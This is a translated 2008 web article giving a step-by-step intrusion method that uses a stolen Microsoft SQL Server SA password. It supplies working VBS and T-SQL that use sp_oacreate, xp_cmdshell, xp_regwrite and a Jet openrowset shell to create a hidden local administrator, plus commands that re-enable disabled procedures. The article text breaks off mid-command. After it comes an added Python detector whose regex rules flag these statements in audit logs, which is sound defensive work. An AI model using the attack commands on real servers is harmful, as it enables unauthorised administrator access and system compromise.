The Latest Intrusion Method Using Microsoft SQL Server SA Privileges

2008-07-30 06:50:46 Source: Internet

This article is the pinyin-transliterated version of "Microsoft SQL Server SA权限最新入侵方法".
  After obtaining the SA password, it is often impossible to add an administrator account because the server administrator or a "predecessor" has restricted the use of net.exe and net1.exe. We know that VBS, in its Active Directory (ADSI) part, has a WinNT object for managing local resources; with it, an administrator can be added without relying on CMD or similar commands. The code is as follows:
  set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  os="WinNT://"&wsnetwork.ComputerName
  Set ob=GetObject(os) ' get the ADSI interface and bind
  Set oe=GetObject(os&"/Administrators,group") ' property: the admin group
  Set od=ob.Create("user","test") ' create the user
  od.SetPassword "1234" ' set the password
  od.SetInfo ' save
  Set of=GetObject(os&"/test",user) ' get the user
  oe.add os&"/test"
  Save the code above as 1.vbs and run it with the command "cscript 1.vbs"; this adds a user named test with the password 1234 to the system. The code to execute in Query Analyzer is as follows:
  declare @o int, @f int, @t int, @ret int
  exec sp_oacreate 'scripting.filesystemobject', @o out
  exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
  exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
  exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
  exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
  exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
  After executing the statements above, execute the following line. It must be executed on its own, not together with the statements above; otherwise the message "c:\1.vbs is being run by another program" appears and the user is not added:
  exec master..xp_cmdshell 'cscript c:\1.vbs'
  If the system user was not added, it may be because the password 1234 is too simple and does not meet the server's password-complexity policy; consider setting a more complex one and testing again. echo can also be used to write the code into 1.vbs, in this form:
  exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK") >>1.vbs'
  However, for some unknown reason, no command line containing the "&" character can be written into 1.vbs; interested readers can try to solve this.
  Using Jet sandbox mode avoids the trouble caused by stored procedures such as XP_cmdshell and their related dynamic-link libraries. For security reasons, sandbox mode is not enabled by default, so xp_regwrite is needed to enable it:
  Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
  Then execute the sandbox command to add a user named test with the password 1234 to the system:
  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')
  The path differs between operating systems and must be adjusted accordingly:
  NT/2K: c:\winnt\system32\
  XP/2003: c:\windows\system32\
  In addition, in Microsoft SQL Server 2005 some stored procedures are disabled by default and must be enabled with commands:
  Enable XP_cmdshell:
  EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
  Enable 'OPENROWSET':
  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
  Enable 'sp_oacreate':
  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp
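
  Added example, not part of the original article: a small Python detector that flags the statement patterns shown above in a captured SQL Server statement log, for use by defenders reviewing audit or trace output. The rule names, logins and sample events are constructed for illustration; 'Ole Automation Procedures' is the standard sp_configure option that governs sp_oacreate.

```python
import re

# Rules matched against a lower-cased, whitespace-collapsed statement.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("enable_dangerous_option", re.compile(
        r"sp_configure\s*'(xp_cmdshell|ad hoc distributed queries"
        r"|ole automation procedures)'\s*,\s*1\b")),
    ("jet_sandbox_registry_write", re.compile(
        r"xp_regwrite\b.*software\\microsoft\\jet\\4\.0\\engines.*sandboxmode")),
    ("openrowset_jet_shell", re.compile(
        r"openrowset\s*\(\s*'microsoft\.jet\.oledb\.4\.0'.*\bshell\s*\(")),
    ("ole_automation_file_write", re.compile(
        r"sp_oacreate\s*'scripting\.filesystemobject'")),
    ("xp_cmdshell_script_host", re.compile(
        r"xp_cmdshell\s*'\s*(cscript|wscript)\b")),
]

def normalise(stmt):
    """Collapse whitespace and lower-case so EXEC/exec and wrapped batches match alike."""
    return re.sub(r"\s+", " ", stmt).strip().lower()

def classify(stmt):
    """Return the names of every rule the statement triggers."""
    s = normalise(stmt)
    return [name for name, rx in RULES if rx.search(s)]

def scan(events):
    """events: iterable of (login, statement) pairs -> list of (login, rule) findings."""
    return [(login, rule) for login, stmt in events for rule in classify(stmt)]

# Constructed sample capture: statements adapted from the article (the shell
# command is replaced with a harmless one) plus two that must not alert.
SAMPLE_EVENTS = [
    ("sa", "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
           "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"),
    ("sa", r"Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE',"
           r"'SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1"),
    ("sa", r"""select * from openrowset('microsoft.jet.oledb.4.0',"""
           r"""';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c ver")')"""),
    ("sa", "exec sp_oacreate 'scripting.filesystemobject', @o out"),
    ("sa", r"exec master..xp_cmdshell 'cscript c:\1.vbs'"),
    ("dba_ops", "EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;"),  # disabling: no alert
    ("report_svc", "select name from sys.databases"),                 # benign
]

if __name__ == "__main__":
    for login, rule in scan(SAMPLE_EVENTS):
        print(f"{login}: {rule}")
```

  Any hit from an application login, or any change of these options outside a change window, is worth reviewing; on a hardened server all three options stay at 0.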
 
 
 
 
 
 
 
 